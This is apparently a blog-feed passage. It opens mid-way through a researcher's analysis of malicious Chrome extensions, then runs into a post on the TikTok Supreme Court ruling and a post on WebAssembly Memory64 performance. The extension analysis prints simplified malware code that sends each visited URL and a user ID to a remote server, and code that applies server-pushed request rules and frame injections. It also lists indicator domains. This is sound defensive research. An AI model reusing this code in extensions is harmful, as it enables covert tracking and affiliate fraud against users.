These extensions are associated with a company named Phoenix Invicta Inc, formerly Funteq Inc. While supposedly a US company of around 20 people, its terms of service claim to be governed by Hong Kong law, all while the company hires its employees in Ukraine. While it doesn’t seem to have any physical offices, the company offers its employees the use of two co-working spaces in Kyiv. To add even more confusion, Funteq Inc. was registered in the US with its “office address” being a two room apartment in Moscow.

Before founding this company in 2016 its CEO worked as CTO of something called Ormes.ru. Apparently, Ormes.ru was in the business of monetizing apps and browser extensions. Its sales pitches can still be found all over the web, offering extension developers to earn money with various kinds of ads. Clearly, there has been some competence transfer here.

Occasionally Phoenix Invicta websites will claim to be run by another company named Damiko Inc. Of course these claims don’t have to mean anything, as the same websites will also occasionally claim to be run by a company in the business of … checks notes … selling knifes.

Yet Damiko Inc. is officially offering a number of extensions in the Chrome Web Store. And while these certainly aren’t the same as the Phoenix Invicta extensions, all but one of these extensions share certain similarities with them. In particular, these extensions remove the Content-Security-Policy HTTP header despite having no means of injecting HTML content into web pages from what I can tell.

Damiko Inc. appears to be a subsidiary of the Russian TomskSoft LLC, operating in the US under the name Tomsk Inc. How does this fit together? Did TomskSoft contract Phoenix Invicta to develop browser extensions for them? Or is Phoenix Invicta another subsidiary of TomskSoft? Or some other construct maybe? I don’t know. I asked TomskSoft for comment on their relationship with this company but haven’t received a response so far.

The affected extensions

The following extensions are associated with Phoenix Invicta:

Name Weekly active users Extension ID Featured
Click & Pick 20 acbcnnccgmpbkoeblinmoadogmmgodoo
AdBlock for Youtube: Skip-n-Watch 3,000 coebfgijooginjcfgmmgiibomdcjnomi
Dopni - Automatic Cashback Service 19 ekafoahfmdgaeefeeneiijbehnbocbij
SkipAds Plus 95 emnhnjiiloghpnekjifmoimflkdmjhgp
1-Click Color Picker: Instant Eyedropper (hex, rgb, hsl) 10,000 fmpgmcidlaojgncjlhjkhfbjchafcfoe
Better Color Picker - pick any color in Chrome 10,000 gpibachbddnihfkbjcfggbejjgjdijeb
Easy Dark Mode 869 ibbkokjdcfjakihkpihlffljabiepdag
Manuals Viewer 101 ieihbaicbgpebhkfebnfkdhkpdemljfb
ScreenCapX - Full Page Screenshot 20,000 ihfedmikeegmkebekpjflhnlmfbafbfe
Capture It - Easy Screenshot Tool (Full Page, Selected, Visible Area) 48 lkalpedlpidbenfnnldoboegepndcddk
AdBlock - Ads and Youtube 641 nonajfcfdpeheinkafjiefpdhfalffof
Manual Finder 2024 280 ocbfgbpocngolfigkhfehckgeihdhgll
Volume Booster - Super Sound Booster 8,000 ojkoofedgcdebdnajjeodlooojdphnlj
Font Expert: Identify Fonts from Images & Websites 666 pjlheckmodimboibhpdcgkpkbpjfhooe

The following table also lists the extensions officially developed by Damiko Inc. With these, there is no indication of malicious intent, yet all but the last one share similarities with Phoenix Invicta extensions above and remove security headers.

Name Weekly active users Extension ID Featured
Screen Recorder 685 bgnpgpfjdpmgfdegmmjdbppccdhjhdpe
Halloween backgrounds and stickers for video calls and chats 31 fklkhoeemdncdhacelfjeaajhfhoenaa
AI Webcam Effects + Recorder: Google Meet, Zoom, Discord & Other Meetings 46 iedbphhbpflhgpihkcceocomcdnemcbj
Beauty Filter 136 mleflnbfifngdmiknggikhfmjjmioofi
Background Noise Remover 363 njmhcidcdbaannpafjdljminaigdgolj
Camera Picture In Picture (PIP Overlay) 576 pgejmpeimhjncennkkddmdknpgfblbcl

Netflix Party

Back in 2023 I pointed out that “Adblock all advertisements” is malicious and spying on its users. A year earlier McAfee already called out a bunch of extensions as malicious. For whatever reason, Google decided to let Adblock all advertisements stay, and three extensions from the McAfee article also remained in Chrome Web Store: Netflix Party, FlipShope and AutoBuy Flash Sales. Out of these three, Netflix Party and AutoBuy Flash Sales still (or again) contain malicious functionality.

Update (2025-01-28): This article originally claimed that FlipShope extension was also malicious and listed this extension cluster under the name of its developing company, Technosense Media. This was incorrect, the extension merely contained some recognizable but dead code. According to Technosense Media, they bought the extension in 2023. Presumably, the problematic code was introduced by the previous extension owner and is unused.

Spying on the users

Coming back to Adblock all advertisements, it is still clearly spying on its users, using ad blocking functionality as a pretense to send the address of each page visited to its server (code slightly simplified for readability):

chrome.tabs.onUpdated.addListener(async (tabId, changeInfo, tab) => {
  if ("complete" === changeInfo.status) {
    let params = {
      url: tab.url,
      userId: await chrome.storage.sync.get("userId")
    };
    const response = await fetch("https://smartadblocker.com/extension/rules/api", {
      method: "POST",
      credentials: "include",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify(params)
    });
    const rules = await response.json();
    
  }
});

Supposedly, this code downloads a set of site-specific rules. This could in theory be legitimate functionality not meant to spy on users. That it isn’t legitimate functionality here isn’t indicated merely by the fact that the endpoint doesn’t produce any really meaningful responses. Legitimate functionality not intending to spy wouldn’t send a unique user ID with the request, the page address would be cut down to the host name (or would at least have all parameters removed) and the response would be cached. The latter would happen simply to reduce the load on this endpoint, something that anybody does unless the endpoint is paid for with users’ data.

The bogus rule processing

Nothing about the section above is new, I’ve already written as much in 2023. But either I haven’t taken a close look at the rule processing back then or it got considerably worse. Here is what it looks like today (variable and function naming is mine, the code was minified):

for (const key in rules)
  if ("id" === key || "genericId" === key)
    // Remove elements by ID
  else if ("class" === key || "genericClass" === key)
    // Remove elements by class name
  else if ("innerText" === key)
    // Remove elements by text
  else if ("rules" === key)
    if (rules.updateRules)
      applyRules(rules[key], rules.rule_scope, tabId);
  else if ("cc" === key)
    // Bogus logic to let the server decide which language-specific filter list
    // should be enabled

The interesting part here is the applyRules call which conveniently isn’t triggered by the initial server responses (updateRules key is set to false). This function looks roughly like this:

async function applyRules(rules, scope, tabId) {
  if ("global" !== scope) {
    if (0 !== rules.length) {
      const existingRules = await chrome.declarativeNetRequest.getDynamicRules();
      const ruleIds = existingRules.map(rule => rule.id);
      chrome.declarativeNetRequest.updateDynamicRules({
        removeRuleIds: ruleIds,
        addRules: rules
      });
    }
  } else {
    chrome.tabs.sendMessage(tabId, {
      message: "start",
      link: rules
    });
  }
}

So if the “scope” is anything but "global" the rules provided by the server will be added to the declarativeNetRequest API. Modifying these rules on per-request basis makes no sense for ad blocking, but it opens up rich possibilities for abuse as we’ve seen already. Given what McAfee discovered about these extensions before this is likely meant for cookie stuffing, yet execution of arbitrary JavaScript code in the context of targeted web pages is also a possible scenario.

And if the “scope” is "global" the extension sends a message to its content script which will inject a frame with the given address into the page. Again, this makes no sense whatsoever for blocking ads, but it definitely works for affiliate fraud – which is what these extensions are all about according to McAfee.

Depending on the extension there might be only frame injection or only adding of dynamic rules. Given the purpose of the AutoBuy extension, it can probably pass as legitimate by Google’s rules, others not so much.

The affected extensions

Name Weekly active users Extension ID Featured
Auto Refresh Plus 100,000 ffejlioijcokmblckiijnjcmfidjppdn
Smart Auto Refresh 100,000 fkjngjgmgbfelejhbjblhjkehchifpcj
Adblock all advertisement - No Ads extension 700,000 gbdjcgalliefpinpmggefbloehmmknca
AutoBuy Flash Sales, Deals, and Coupons 20,000 gbnahglfafmhaehbdmjedfhdmimjcbed
Autoskip for Youtube™ Ads 200,000 hmbnhhcgiecenbbkgdoaoafjpeaboine
Smart Adblocker 50,000 iojpcjjdfhlcbgjnpngcmaojmlokmeii
Adblock for Browser 10,000 jcbjcocinigpbgfpnhlpagidbmlngnnn
Netflix Party 500,000 mmnbenehknklpbendgmgngeaignppnbe
Free adblocker 8,000 njjbfkooniaeodkimaidbpginjcmhmbm
Video Ad Block Youtube 100,000 okepkpmjhegbhmnnondmminfgfbjddpb
Picture in Picture for Videos 30,000 pmdjjeplkafhkdjebfaoaljknbmilfgo

Update (2025-01-28): Added Auto Refresh Plus and Picture in Picture for Videos to the list. The former only contains the spying functionality, the latter spying and frame injection.

Sweet VPN

I’ll be looking at Sweet VPN as representative for 32 extensions I found using highly obfuscated code. These extensions aren’t exactly new to this blog either, my post in 2023 already named three of them even though I couldn’t identify the malicious functionality back then. Most likely I simply overlooked it, I didn’t have time to investigate each extension thoroughly.

These extensions also decided to circumvent remote code restrictions but their approach is way more elaborate. They download some JSON data from the server and add it to the extension’s storage. While some keys like proxy_list are expected here and always present, a number of others are absent from the server response when the extension is first installed. These can contain malicious instructions.

Anti-debugging protection

For example, the four keys 0, 1, 2, 3 seem to be meant for anti-debugging protection. If present, the values of these keys are concatenated and parsed as JSON into an array. A property resolution mechanism then allows resolving arbitrarily deep values, starting at the self object of the extension’s background worker. The result are three values which are used like this:

value1({value2: value3}, result => {
  
});

This call is repeated every three seconds. If result is a non-empty array, the extension removes all but a few storage keys and stops further checks. This is clearly meant to remove traces of malicious activity. I am not aware of any ways for an extension to detect an open Developer Tools window, so this call is probably meant to detect the extension management page that Developer Tools are opened from:

chrome.tabs.query({"url": "chrome://extensions/*"}, result => {
  
});

Guessing further functionality

This protection mechanism is only a very small part of the obfuscated logic in the extension. There are lots of values being decoded, tossed around, used in some function calls. It is difficult to reconstruct the logic with the key parts missing. However, the extension doesn’t have too many permissions:

"permissions": [
  "proxy",
  "storage",
  "tabs"
],
"host_permissions": [
  "https://ipapi.co/json/",
  "https://ip.seeip.org/geoip",
  "https://api.myip.com/",
  "https://ifconfig.co/json"
],

Given that almost no websites can be accessed directly, it’s a safe bet that the purpose of the concealed functionality is spying on the users. That’s what the tabs permission is for, to be notified of any changes in the user’s browsing session.

In fact, once you know that the function being passed as parameter is a tabs.onUpdated listener its logic becomes way easier to understand, despite the missing parts. So the cl key in the extension’s storage (other extensions often use other names) is the event queue where data about the user’s browsing is being stored. Once there are at least 10 events the queue is sent to the same address where the extension downloads its configuration from.

There are also some chrome.tabs.update() calls in the code, replacing the address of the currently loading page by something else. It’s hard to be certain what these are used for: it could be search redirection, affiliate fraud or plainly navigating to advertising pages.

The affected extensions

Name Weekly active users Extension ID Featured
VK UnBlock. Works fast. 40,000 ahdigjdpekdcpbajihncondbplelbcmo
VPN Proxy Master 120 akkjhhdlbfibjcfnmkmcaknbmmbngkgn
VPN Unblocker for Instagram 8,000 akmlnidakeiaipibeaidhlekfkjamgkm
StoriesHub 100,000 angjmncdicjedpjcapomhnjeinkhdddf
Facebook and Instagram Downloader 30,000 baajncdfffcpahjjmhhnhflmbelpbpli
Downloader for Instagram - ToolMaster 100,000 bgbclojjlpkimdhhdhbmbgpkaenfmkoe
TikTok in USA 20,000 bgcmndidjhfimbbocplkapiaaokhlcac
Sweet VPN 100,000 bojaonpikbbgeijomodbogeiebkckkoi
Access to Odnoklassniki 4,000 ccaieagllbdljoabpdjiafjedojoejcl
Ghost - Anonymous Stories for Instagram 20,000 cdpeckclhmpcancbdihdfnfcncafaicp
StorySpace Manager for FB and IG Stories 10,000 cicohiknlppcipjbfpoghjbncojncjgb
VPN Unblocker for YouTube 40,000 cnodohbngpblpllnokiijcpnepdmfkgm
Universal Video Downloader 200,000 cogmkaeijeflocngklepoknelfjpdjng
Free privacy connection - VPN guru 500,000 dcaffjpclkkjfacgfofgpjbmgjnjlpmh
Live Recorder for Instagram aka MasterReco 10,000 djngbdfelbifdjcoclafcdhpamhmeamj
Video Downloader for Vimeo 100,000 dkiipfbcepndfilijijlacffnlbchigb
VPN Ultimate - Best VPN by unblock 400,000 epeigjgefhajkiiallmfblgglmdbhfab
Insured Smart VPN - Best Proxy ever unblock everything 2,000 idoimknkimlgjadphdkmgocgpbkjfoch
Ultra Downloader for Instagram 30,000 inekcncapjijgfjjlkadkmdgfoekcilb
Parental Control. Blocks porn, malware, etc. 3,000 iohpehejkbkfdgpfhmlbogapmpkefdej
UlV. Ultimate downloader for Vimeo 2,000 jpoobmnmkchgfckdlbgboeaojhgopidn
Simplify. Downloader for Instagram 20,000 kceofhgmmjgfmnepogjifiomgojpmhep
Download Facebook Video 591 kdemfcffpjfikmpmfllaehabkgkeakak
VPN Unblocker for Facebook 3,000 kheajjdamndeonfpjchdmkpjlemlbkma
Video Downloader for FaceBook 90,000 kjnmedaeobfmoehceokbmpamheibpdjj
TikTok Video Keeper 40,000 kmobjdioiclamniofdnngmafbhgcniok
Mass Downloader for Instagram 100,000 ldoldiahbhnbfdihknppjbhgjngibdbe
Stories for FaceBook - Anon view, download 3,000 nfimgoaflmkihgkfoplaekifpeicacdn
VPN Surf - Fast VPN by unblock 800,000 nhnfcgpcbfclhfafjlooihdfghaeinfc
TikTok Video Downloader 20,000 oaceepljpkcbcgccnmlepeofkhplkbih
Video Downloader for FaceBook 10,000 ododgdnipimbpbfioijikckkgkbkginh
Exta: Pro downloader for Instagram 10,000 ppcmpaldbkcoeiepfbkdahoaepnoacgd

Bonus section: more malicious extensions

Update (2025-01-20): Added Adblock Bear and AdBlock 360 after a hint from a commenter.

As is often the case with Chrome Web Store, my searches regularly turned up more malicious extensions unrelated to the ones I was looking for. Some of them also devised their mechanisms to execute remote code. I didn’t find more extensions using the same approach, which of course doesn’t mean that there are none.

Adblock for Youtube is yet another browser extension essentially bundling an interpreter for their very own minimalistic programming language. One part of the instructions it receives from its server is executed in the context of the privileged background worker, the other in the content script context.

EasyNav, Adblock Bear and AdBlock 360 use an approach quite similar to Phoenix Invicta. In particular, they add rules to the declarativeNetRequest API that they receive from their respective server. EasyNav also removes security headers. These extensions don’t bother with HTML injection however, instead their server produces a list of scripts to be injected into web pages. There are specific scripts for some domains and a fallback for everything else.

Download Manager Integration Checklist is merely supposed to display some instructions, it shouldn’t need any privileges at all. Yet this extension requests access to all web pages and will add rules to the declarativeNetRequest API that it downloads from its server.

Translator makes it look like its configuration is all about downloading a list of languages. But it also contains a regular expression to test against website addresses and the instructions on what to do with matching websites: a tag name of the element to create and a bunch of attributes to set. Given that the element isn’t removed after insertion, this is probably about injecting advertising frames. This mechanism could just as well be used to inject a script however.

The affected extensions

Name Weekly active users Extension ID Featured
Adblock for Youtube™ - Auto Skip ad 8,000 anceggghekdpfkjihcojnlijcocgmaoo
EasyNav 30,000 aobeidoiagedbcogakfipippifjheaom
Adblock Bear - stop invasive ads 100,000 gdiknemhndplpgnnnjjjhphhembfojec
AdBlock 360 400,000 ghfkgecdjkmgjkhbdpjdhimeleinmmkl
Download Manager Integration Checklist 70,000 ghkcpcihdonjljjddkmjccibagkjohpi
Translator 100,000 icchadngbpkcegnabnabhkjkfkfflmpj

IOCs

The following domain names are associated with Phoenix Invicta:

  • 1-click-cp[.]com
  • adblock-ads-and-yt[.]pro
  • agadata[.]online
  • anysearch[.]guru
  • anysearchnow[.]info
  • astatic[.]site
  • astato[.]online
  • astralink[.]click
  • best-browser-extensions[.]com
  • better-color-picker[.]guru
  • betterfind[.]online
  • capture-it[.]online
  • chrome-settings[.]online
  • click-and-pick[.]pro
  • color-picker-quick[.]info
  • customcursors[.]online
  • dailyview[.]site
  • datalocked[.]online
  • dmext[.]online
  • dopni[.]com
  • doublestat[.]info
  • doubleview[.]online
  • easy-dark-mode[.]online
  • emojikeyboard[.]site
  • everyview[.]info
  • fasterbrowser[.]online
  • fastertabs[.]online
  • findmanual[.]org
  • fivem[.]com[.]tr
  • fixfind[.]online
  • font-expert[.]pro
  • freestikers[.]top
  • freetabmemory[.]online
  • get-any-manual[.]pro
  • get-manual[.]info
  • getresult[.]guru
  • good-ship[.]com
  • gulkayak[.]com
  • isstillalive[.]com
  • kralforum[.]com[.]tr
  • locodata[.]site
  • lottingem[.]com
  • manual-finder[.]site
  • manuals-viewer[.]info
  • megaboost[.]site
  • nocodata[.]online
  • ntdataview[.]online
  • picky-ext[.]pro
  • pocodata[.]pro
  • readtxt[.]pro
  • rumorpix[.]com
  • screencapx[.]co
  • searchglobal[.]online
  • search-protection[.]org
  • searchresultspage[.]online
  • shurkul[.]online
  • skipadsplus[.]online
  • skip-all-ads[.]info
  • skip-n-watch[.]info
  • skippy[.]pro
  • smartsearch[.]guru
  • smartsearch[.]top
  • socialtab[.]top
  • soundbooster[.]online
  • speechit[.]pro
  • super-sound-booster[.]info
  • tabmemoptimizer[.]site
  • taboptimizer[.]com
  • text-speecher[.]online
  • topodat[.]info
  • triplestat[.]online
  • true-sound-booster[.]online
  • ufind[.]site
  • video-downloader-click-save[.]online
  • video-downloader-plus[.]info
  • vipoisk[.]ru
  • vipsearch[.]guru
  • vipsearch[.]top
  • voicereader[.]online
  • websiteconf[.]online
  • youtube-ads-skip[.]site
  • ystatic[.]site

The following domain names are used by Netflix Party and related extensions:

  • abforbrowser[.]com
  • autorefresh[.]co
  • autorefreshplus[.]in
  • getmatchingcouponsanddeals[.]info
  • pipextension[.]com
  • smartadblocker[.]com
  • telenetflixparty[.]com
  • ytadblock[.]com
  • ytadskip[.]com

The following domain names are used by Sweet VPN and related extensions:

  • analyticsbatch[.]com
  • aquafreevpn[.]com
  • batchindex[.]com
  • browserdatahub[.]com
  • browserlisting[.]com
  • checkbrowserer[.]com
  • countstatistic[.]com
  • estimatestatistic[.]com
  • metricbashboard[.]com
  • proxy-config[.]com
  • qippin[.]com
  • realtimestatistic[.]com
  • secondstatistic[.]com
  • securemastervpn[.]com
  • shceduleuser[.]com
  • statisticindex[.]com
  • sweet-vpn[.]com
  • timeinspection[.]com
  • traficmetrics[.]com
  • trafficreqort[.]com
  • ultimeo-downloader[.]com
  • unbansocial[.]com
  • userestimate[.]com
  • virtualstatist[.]com
  • webstatscheck[.]com

These domain names are used by the extensions in the bonus section:

  • adblock-360[.]com
  • easynav[.]net
  • internetdownloadmanager[.]top
  • privacy-bear[.]net
  • skipads-ytb[.]com
  • translatories[.]com

Don MartiSupreme Court files confusing bug report

I’m still an Internet optimist despite…things…so I was hoping that Friday’s Supreme Court opinion in the TikTok case would have some useful information about how to design online social networking in a way that does get First Amendment protection, even if TikTok doesn’t. But no. Considered as a bug report, the opinion doesn’t help much. We basically got (1) TikTok collects lots of personal info (2) Congress gets to decide if and how it’s a national security problem to make personal info available to a foreign adversary, and so TikTok is banned. But everyone else doing social software, including collaboration software, is going to have a lot to find out for themselves.

The Supreme Court pretty much ignores TikTok’s dreaded For You Page algorithm and focuses on the privacy problem. So we don’t know if some future ban of some hypothetical future app that somehow fixed its data collection issues would hold up in court just based on how it does content recommendations. (Regulating recommendation algorithms is a big issue that I’m not surprised the Court couldn’t agree on in the short time they had for this case.) We also get the following, on p. 9—TikTok got the benefit of the doubt and received some First Amendment consideration that future apps might or might not.

This Court has not articulated a clear framework for determining whether a regulation of non-expressive activity that disproportionately burdens those engaged in expressive activity triggers heightened review. We need not do so here. We assume without deciding that the challenged provisions fall within this category and are subject to First Amendment scrutiny.

Page 11 should be good news for anybody drafting a privacy law anyway. Regulating data collection is content neutral for First Amendment purposes—which should be common sense.

The Government also supports the challenged provisions with a content-neutral justification: preventing China from collecting vast amounts of sensitive data from 170 million U. S. TikTok users. That rationale is decidedly content agnostic. It neither references the content of speech on TikTok nor reflects disagreement with the message such speech conveys….Because the data collection justification reflects a purpose[e] unrelated to the content of expression, it is content neutral.

The outbound flow of data from people in the USA is what makes the TikTok ban hold up in court. Prof. Eric Goldman writes that the ban is taking advantage of a privacy pretext for censorship, which is definitely something to watch out for in future privacy laws, but doesn’t apply in this case.

But so far the to-do list for future apps looks manageable.

  • Don’t surveil US users for a foreign adversary

  • Comply with whatever future restrictions on recommendation algorithms turn out to hold up in court. (Disclosure of rules or source code? Allow users to switch to chronological? Allow client-side or peer-to-peer filtering and scoring? Lots of options but possible to get out ahead of.)

Not so fast. Here’s the hard part. According to the Court the problem is not just the info that the app collects automatically and surreptitiously, or the user actions it records, but also the info that users send by some deliberate action. On page 14:

If, for example, a user allows TikTok access to the user’s phone contact list to connect with others on the platform, TikTok can access any data stored in the user’s contact list, including names, contact information, contact photos, job titles, and notes. Access to such detailed information about U. S. users, the Government worries, may enable China to track the locations of Federal employees and contractors, build dossiers of personal information for blackmail, and conduct corporate espionage.

and in Justice Gorsuch’s concurrence,

According to the Federal Bureau of Investigation, TikTok can access any data stored in a consenting user’s contact list—including names, photos, and other personal information about unconsenting third parties. Ibid. (emphasis added). And because the record shows that the People’s Republic of China (PRC) can require TikTok’s parent company to cooperate with [its] efforts to obtain personal data, there is little to stop all that information from ending up in the hands of a designated foreign adversary.

On the one hand, yes, sharing contacts does transfer a lot of information about people in the USA to TikTok. But sharing a contact list with an app can work a lot of different ways. It can be

  1. covert surveillance (although mobile platforms generally do their best to prevent this)

  2. data sharing that you get tricked into

  3. deliberate, more like choosing to email a copy of the company directory as an attachment

If it’s really a problem to enable a user to choose to share contact info, then that makes running collaboration software like GitHub in China a problem from the USA side. (Git repositories are full of metadata about who works on what, with who. And that information is processed by other users, by the platform itself, and by third-party tools.) Other content creation tools also share the kinds of info on skills and work relationships that would be exactly what a foreign adversary murder robot needs to prioritize targets. But the user, not some surveillance software, generally puts that info there. If intentional contact sharing by users is part of the reason that the USA can ban TikTok, what does that mean for other kinds of user to user communication?

Kleptomaniac princesses

There’s a great story I read when I was a kid that I wish I had the citation for. It might be fictional, but I’m going to summarize it anyway because it’s happening again.

Once upon a time there was a country that the UK really, really wanted to maintain good diplomatic relations with. The country was in a critical strategic location and had some kind of natural resources or something, I don’t remember the details. The problem, though, was that the country was a monarchy, and one of the princesses loved to visit London and shoplift. And she was really bad at it. So diplomats had to go around to the stores in advance to tell the manager what’s going on, convince the store to let her steal stuff, and promise to settle up afterwards.

Today, the companies that run the surveillance apps are a lot like that princess. techbros don’t have masculine energy, they have kleptomaniac princess energy If one country really needs to maintain good relations with another, they’ll allow that country’s surveillance apps to get away with privacy shenanigans. If relations get chillier, then normal law enforcement applies. At least for now, though, we don’t know what the normal laws here will look like, and the Supreme Court didn’t provide many hints yesterday.

Related

Big Tech platforms: mall, newspaper, or something else? A case where the Supreme Court did give better instructions (to state legislators, though, not app developers)

In TikTok v. Garland, Supreme Court Sends Good Vibes for Privacy Laws, But Congress’s Targeting of TikTok Alone Won’t Do Much to Protect Privacy by Tom McBrien, EPIC Counsel. The Court’s opinion was also a good sign for privacy advocates because it made clear that regulating data practices is an important and content-neutral regulatory intervention. Tech companies and their allies have long misinterpreted a Supreme Court case called Sorrell v. IMS Health to mean that all privacy laws are presumptively unconstitutional under the First Amendment because information is speech. But the TikTok Court explained that passing a law to protect privacy is decidedly content agnostic because it neither references the content of speech…nor reflects disagreement with the message such speech conveys. In fact, the Court found the TikTok law constitutional specifically on the grounds that it was passed to regulate privacy and emphasized how important the government interest is in protecting American’s privacy.

Bonus links

TikTok, AliExpress, SHEIN & Co surrender Europeans’ data to authoritarian China Today, noyb has filed GDPR complaints against TikTok, AliExpress, SHEIN, Temu, WeChat and Xiaomi for unlawful data transfers to China….As none of the companies responded adequately to the complainants’ access requests, we have to assume that this includes China. But EU law is clear: data transfers outside the EU are only allowed if the destination country doesn’t undermine the protection of data.

Total information collapse by Carole Cadwalladr It was the open society that enabled Zuckerberg to build his company, that educated his engineers and created a modern scientific country that largely obeyed the rules-based order. But that’s over. And, this week is a curtain raiser for how fast everything will change. Zuckerberg took a smashing ball this week to eight years’ worth of “trust and safety” work that has gone into trying to make social media a place fit for humans. That’s undone in a single stroke.

Lawsuit: Allstate used GasBuddy and other apps to quietly track driving behavior by Kevin Purdy. (But which of the apps running tracking software are foreign-owned? Because you can register an LLC in many states anonymously, it’s impossible to tell.)

Baltic Leadership in Brussels: What the New High Representative Kaja Kallas Means for Tech Policy | TechPolicy.Press by Sophie L. Vériter. [O]nline platforms and their users are affected by EU foreign policy through counter-disinformation regulations aimed at addressing foreign threats of interference and manipulation. Indeed, technology is increasingly considered a matter of security in the EU, which means that the HRVP may well have a significant impact on the digital space within and beyond the EU.

The Ministry of Empowerment by danah boyd. This isn’t about shareholder value. It’s about a kayfabe war between tech demagogues vying to be the most powerful boy in the room.

As Australia bans social media for kids under 16, age-assurance tech is in the spotlight by Natasha Lomas (more news from the splinternet)

Spidermonkey Development BlogIs Memory64 actually worth using?

After many long years, the Memory64 proposal for WebAssembly has finally been released in both Firefox 134 and Chrome 133. In short, this proposal adds 64-bit pointers to WebAssembly.

If you are like most readers, you may be wondering: “Why wasn’t WebAssembly 64-bit to begin with?” Yes, it’s the year 2025 and WebAssembly has only just added 64-bit pointers. Why did it take so long, when 64-bit devices are the majority and 8GB of RAM is considered the bare minimum?

It’s easy to think that 64-bit WebAssembly would run better on 64-bit hardware, but unfortunately that’s simply not the case. WebAssembly apps tend to run slower in 64-bit mode than they do in 32-bit mode. This performance penalty depends on the workload, but it can range from just 10% to over 100%—a 2x slowdown just from changing your pointer size.

This is not simply due to a lack of optimization. Instead, the performance of Memory64 is restricted by hardware, operating systems, and the design of WebAssembly itself.

What is Memory64, actually?

To understand why Memory64 is slower, we first must understand how WebAssembly represents memory.

When you compile a program to WebAssembly, the result is a WebAssembly module. A module is analogous to an executable file, and contains all the information needed to bootstrap and run a program, including:

  • A description of how much memory will be necessary (the memory section)
  • Static data to be copied into memory (the data section)
  • The actual WebAssembly bytecode to execute (the code section)

These are encoded in an efficient binary format, but WebAssembly also has an official text syntax used for debugging and direct authoring. This article will use the text syntax. You can convert any WebAssembly module to the text syntax using tools like WABT (wasm2wat) or wasm-tools (wasm-tools print).

Here’s a simple but complete WebAssembly module that allows you to store and load an i32 at address 16 of its memory.

(module
  ;; Declare a memory with a size of 1 page (64KiB, or 65536 bytes)
  (memory 1)

  ;; Declare, and export, our store function
  (func (export "storeAt16") (param i32)
    i32.const 16  ;; push address 16 to the stack
    local.get 0   ;; get the i32 param and push it to the stack
    i32.store     ;; store the value to the address
  )

  ;; Declare, and export, our load function
  (func (export "loadFrom16") (result i32)
    i32.const 16  ;; push address 16 to the stack
    i32.load      ;; load from the address
  )
)

Now let’s modify the program to use Memory64:

(module
  ;; Declare an i64 memory with a size of 1 page (64KiB, or 65536 bytes)
  (memory i64 1)

  ;; Declare, and export, our store function
  (func (export "storeAt16") (param i32)
    i64.const 16  ;; push address 16 to the stack
    local.get 0   ;; get the i32 param and push it to the stack
    i32.store     ;; store the value to the address
  )

  ;; Declare, and export, our load function
  (func (export "loadFrom16") (result i32)
    i64.const 16  ;; push address 16 to the stack
    i32.load      ;; load from the address
  )
)

You can see that our memory declaration now includes i64, indicating that it uses 64-bit addresses. We therefore also change i32.const 16 to i64.const 16. That’s it. This is pretty much the entirety of the Memory64 proposal1.

How is memory implemented?

So why does this tiny change make a difference for performance? We need to understand how WebAssembly engines actually implement memories.

Thankfully, this is very simple. The host (in this case, a browser) simply allocates memory for the WebAssembly module using a system call like mmap or VirtualAlloc. WebAssembly code is then free to read and write within that region, and the host (the browser) ensures that WebAssembly addresses (like 16) are translated to the correct address within the allocated memory.

However, WebAssembly has an important constraint: accessing memory out of bounds will trap, analogous to a segmentation fault (segfault). It is the host’s job to ensure that this happens, and in general it does so with bounds checks. These are simply extra instructions inserted into the machine code on each memory access—the equivalent of writing if (address >= memory.length) { trap(); } before every single load2. You can see this in the actual x64 machine code generated by SpiderMonkey for an i32.load3:

  movq 0x08(%r14), %rax       ;; load the size of memory from the instance (%r14)
  cmp %rax, %rdi              ;; compare the address (%rdi) to the limit
  jb .load                    ;; if the address is ok, jump to the load
  ud2                         ;; trap
.load:
  movl (%r15,%rdi,1), %eax    ;; load an i32 from memory (%r15 + %rdi)

These instructions have several costs! Besides taking up CPU cycles, they require an extra load from memory, they increase the size of machine code, and they take up branch predictor resources. But they are critical for ensuring the security and correctness of WebAssembly code.

Unless…we could come up with a way to remove them entirely.

How is memory really implemented?

The maximum possible value for a 32-bit integer is about 4 billion. 32-bit pointers therefore allow you to use up to 4GB of memory. The maximum possible value for a 64-bit integer, on the other hand, is about 18 sextillion, allowing you to use up to 18 exabytes of memory. This is truly enormous, tens of millions of times bigger than the memory in even the most advanced consumer machines today. In fact, because this difference is so great, most “64-bit” devices are actually 48-bit in practice, using just 48 bits of the memory address to map from virtual to physical addresses4.

Even a 48-bit memory is enormous: 65,536 times larger than the largest possible 32-bit memory. This gives every process 281 terabytes of address space to work with, even if the device has only a few gigabytes of physical memory.

This means that address space is cheap on 64-bit devices. If you like, you can reserve 4GB of address space from the operating system to ensure that it remains free for later use. Even if most of that memory is never used, this will have little to no impact on most systems.

How do browsers take advantage of this fact? By reserving 4GB of memory for every single WebAssembly module.

In our first example, we declared a 32-bit memory with a size of 64KB. But if you run this example on a 64-bit operating system, the browser will actually reserve 4GB of memory. The first 64KB of this 4GB block will be read-write, and the remaining 3.9999GB will be reserved but inaccessible.

By reserving 4GB of memory for all 32-bit WebAssembly modules, it is impossible to go out of bounds. The largest possible pointer value, 2^32-1, will simply land inside the reserved region of memory and trap. This means that, when running 32-bit wasm on a 64-bit system, we can omit all bounds checks entirely5.

This optimization is impossible for Memory64. The size of the WebAssembly address space is the same as the size of the host address space. Therefore, we must pay the cost of bounds checks on every access, and as a result, Memory64 is slower.

So why use Memory64?

The only reason to use Memory64 is if you actually need more than 4GB of memory.

Memory64 won’t make your code faster or more “modern”. 64-bit pointers in WebAssembly simply allow you to address more memory, at the cost of slower loads and stores.

The performance penalty may diminish over time as engines make optimizations. Bounds checking strategies can be improved, and WebAssembly compilers may be able to eliminate some bounds checks at compile time. But it is impossible to beat the absolute removal of all bounds checks found in 32-bit WebAssembly.

Furthermore, the WebAssembly JS API constrains memories to a maximum size of 16GB. This may be quite disappointing for developers used to native memory limits. Unfortunately, because WebAssembly makes no distinction between “reserved” and “committed” memory, browsers cannot freely allocate large quantities of memory without running into system commit limits.

Still, being able to access 16GB is very useful for some applications. If you need more memory, and can tolerate worse performance, then Memory64 might be the right choice for you.

Where can WebAssembly go from here? Memory64 may be of limited use today, but there are some exciting possibilities for the future:

  • Bounds checks could be better supported in hardware in the future. There has already been some research in this direction—for example, see this 2023 paper by Narayan et. al. With the growing popularity of WebAssembly and other sandboxed VMs, this could be a very impactful change that improves performance while also eliminating the wasted address space from large reservations. (Not all WebAssembly hosts can spend their address space as freely as browsers.)

